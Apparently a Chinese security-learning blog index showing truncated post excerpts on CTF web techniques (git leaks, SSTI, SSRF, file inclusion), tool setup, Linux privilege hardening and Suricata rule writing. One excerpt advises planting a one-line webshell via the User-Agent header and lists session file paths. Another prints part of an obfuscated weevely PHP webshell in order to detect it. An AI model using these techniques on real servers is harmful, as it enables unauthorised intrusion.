No title
2021/8/20WEB攻关,ERC20代币单词积累:
1234567891011121314151617181920designate任命,委派,指定recursive递归的precede vt/vi 在、、发生之前succinctness n.简明,简化marginal n.边缘的,临界的,边缘席位。defer推迟,拖延,听从collateral n.担保物 adj.附属的,旁系的。interest n.利息fragment n.片段 V.使分裂,使破裂beneficiary n.受益人,财产继承人inception n.开端,初期populate v.居住于,生活于..finalize v.最后确定validate v.确认validation n.确认,有效,检验embed v.(使)嵌入invoke v.调用intrinsic 固有的,内在的
hackworld继续写12345678910111213141516171819202122import requestsfrom IPython.core import payloadurl = &q ...
No title
2021/9/10 可能涉及到git泄露[GXYCTF2019]禁止套娃123.git为初始化git仓库时产生的管理git仓库的隐藏文件夹,包含git操作的所需要的东西。.swp这是在vim编辑时产生的临时文件,与.git类似。vim中的swp即swap文件,在编辑文件时产生,它是隐藏文件,如果程序正常退出,临时文件自动删除,如果意外退出就会保留,文件名为 .filename.swp。
可能存在vim泄露的题目,留下.swp文件,我们访问有的时候可以直接拿到flag。
这个就是一个仓库的文件。
1234567info存放仓库信息hook存放sheetobject存放所有git对象。refs:存放提交hash的地方config:github的配置信息description:仓库的描述信息,主要给gitweb等git托管系统使用HEAD:映射到ref引用,能够找到下一次commit的前一次哈希值。
把这个题刷完之后练习一下git命令建立一个仓库代码储存平台之类的。
这是kali里面的例子。
在kali里面对本题查找git泄露。成功。拿到index.php源码即可。
123456789 ...
No title
2021/9/16MANIM笔记安装教程太多我就不多说了
安装多让大家安装manimgl
manimgl或者manim render都可以。
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283Usage: python -m manim render [OPTIONS] FILE [SCENE_NAMES]... Render SCENE(S) from the input FILE. FILE is the file path of the script. SCENES is an optional list of scenes in the file.Global options: -c, --config_file TEXT Specify the configuration file to ...
No title
2021/9/28 python高级re脚本学习正则表达式不说了,复习n遍了,来看【高明的黑客】题目分析解题脚本:
1234567import os;import sys;import requests;import threading;import time;print("开始时间: "+ time.asctime(time.localtime(time.time())));
这里先解释一堆time函数
time.asctime()是返回可读现在时间形式,形式为1Tue Feb 17 09:42:58 2009;
time.localtime()返回时间的元组形式:
1time.localtime() : time.struct_time(tm_year=2016, tm_mon=11, tm_mday=27, tm_hour=10, tm_min=26, tm_sec=5, tm_wday=6, tm_yday=332, tm_isdst=0)
time.time()表示从1970.1.1开始到现在的时间(seconds)
12time.time()Out[3 ...
No title
2022/1/29复习WEB今天看了看SSRF就是通过构造恶意URL使服务器执行恶意代码在内网中查询我们无法穿透的机器,然后再通过服务器返回到我们的主机。
今天又看了看文件包含,主要是远程文件包含,在PHP5.5以前吧,
1file_url_fopen和file_include_fopen是打开的,也就是允许代码中包含远程php端文件。
执行远程文件包含漏洞的技巧
注意每个浏览器可能记录访问日志,要写一句话木马的话要写在User-Agent中,写在URL中都会被储存了。
或者是这样,利用PHP伪协议,来执行
2.或者是写SESSION文件
PHP中的SESSION文件用于存储SESSION数据,它是根据PHPSESSID来命名存储文件,常见路径:
/var/lib/php/sessions/sess_{PHPSESSID}
/var/lib/php/sess_{PHPSESSID}
/tmp/sess_{PHPSESSID}
/tmp/sessions/sess_{PHPSESSID}
远程文件包含漏洞检测:
(1)向目标参数指定远程 URL 发起请求,确定远程服务器是否收到相应请求 ...
No title
2021.8.1 今日比较杂,终于搞定了pycharm,搞定了SSTI模板注入!在pycharm中学习一个函数比如DES.new(),可以按F4查看源码来了解函数。再按ctal F4来返回程序继续编辑。1234567from Cryptodome.Cipher import DESkey = b"123456ab";des = DES.new(key,DES.MODE_ECB);#创建对象,选择加密模式#加密en_data = des.encrypt("爬虫nb".encode());print(en_data);
这是练习的DES,注意,一个汉字算三个字节,明文必须为密钥整数倍,密钥为8位,明文正好也为8位。
加密出来就是如此。下面解密。
解密完成,记得第一步解密无法表示汉字,要经过utf-8转码。
下面攻关一项重大知识点:SSTI模板注入先学习python沙盒绕过
估计你已经看懂了,
12().__class__应该返回()对应的类名称,也就是元组,由图,返回了tuple().__class__.__bases__返回元组下的基类,也就 ...
No title
2021.8.1 今日比较杂,终于搞定了pycharm,搞定了SSTI模板注入!在pycharm中学习一个函数比如DES.new(),可以按F4查看源码来了解函数。再按ctal F4来返回程序继续编辑。1234567from Cryptodome.Cipher import DESkey = b"123456ab";des = DES.new(key,DES.MODE_ECB);#创建对象,选择加密模式#加密en_data = des.encrypt("爬虫nb".encode());print(en_data);
这是练习的DES,注意,一个汉字算三个字节,明文必须为密钥整数倍,密钥为8位,明文正好也为8位。
加密出来就是如此。下面解密。
解密完成,记得第一步解密无法表示汉字,要经过utf-8转码。
下面攻关一项重大知识点:SSTI模板注入先学习python沙盒绕过
估计你已经看懂了,
12().__class__应该返回()对应的类名称,也就是元组,由图,返回了tuple().__class__.__bases__返回元组下的基类,也就是 ...
php配置xdebug
我们首先安装pecl与pear,这是php的插件程序,有助于我们对xdebug的安装,
然后我们安装xdebug,我们要选择合适我们php配置的xebug,我们打开匹配地址 :https://xdebug.org/wizard.php
我们要将php -i的全部信息放入此网站中获取合适的xdebug。
然后配置php.ini
向文件末尾添加:
1234567[xdebug]zend_extension = /usr/lib/php/extensions/no-debug-non-zts-20121212/xdebug.so //这是配置xdebugxdebug.remote_enable = On //是否运行远程终端,必须开启xdebug.remote_handler = "dbgp"xdebug.remote_host = "localhost"xdebug.remote_port = 9001 //这个端口号要和phpstorm中的保持一致,示例的端口是9001xdebug.idekey = PHPSTROM //调试器关键字
linux用户权限管理
一般情况下,不建议直接使用 root 用户登录,一是减少因操作失误而造成的破坏;二是降低特权密码被泄露的风险。鉴于这些原因,需要为普通用户提供一种身份切换或权限提升机制,以进行管理任务。
(1)su命令——切换用户默认所有用户允许使用 su 命令,从而有机会反复尝试其他用户(root)的登陆密码,带来安全风险。可以使用 pam_wheel认证模块,只允许极个别用户使用 su 命令进行切换。
123456[root@localhost ~]# vim /etc/pam.d/suauth required pam_wheel.so use_uid //这行去掉注释 # [root@localhost ~]# su - ysf[ysf@localhost ~]$ su - root //再次尝试切换,就会提示密码错误密码:su: 密码不正确
上述情况我们在平时也会遇到,可能sudo命令可以输入用户密码后使用,但是不能通过密码进入root用户。
我们需要用sudo的权限添加用户到wheel组。
12345678[root@loc ...
suricata规则的编写
下面我们来写一下针对weevely4.0.1版本产生木马的拦截规则,首先我们通过抓包发现,在连接木马时不会通过网络层发包,只有连接成功后,执行指令时,才会通过网络层,应用层,看到TCP和HTTP请求和响应。所以我们只能针对其连接成功后执行的恶意指令执行匹配和拦截。
我们用通用正则表达式对木马进行匹配,先查看木马文件
weevely产生的PHP木马格式123456789101112<?php$s='@x(@base6Vr4_decode($m[1])Vr,$k)))VrVr;$o=@ob_geVrtVr_conteVrnts();@Vrob_end_cleVraVr';$B='$k="e10aVrdc39";Vr$kh="4Vr9baVr59abVrbe56"Vr;$kf="eVr057f20f883VrVre";$Vrp="ZwNqIe';$K='ents("VrpVrhp://inpVrut"),Vr$m)==1) {@oVrb_ ...



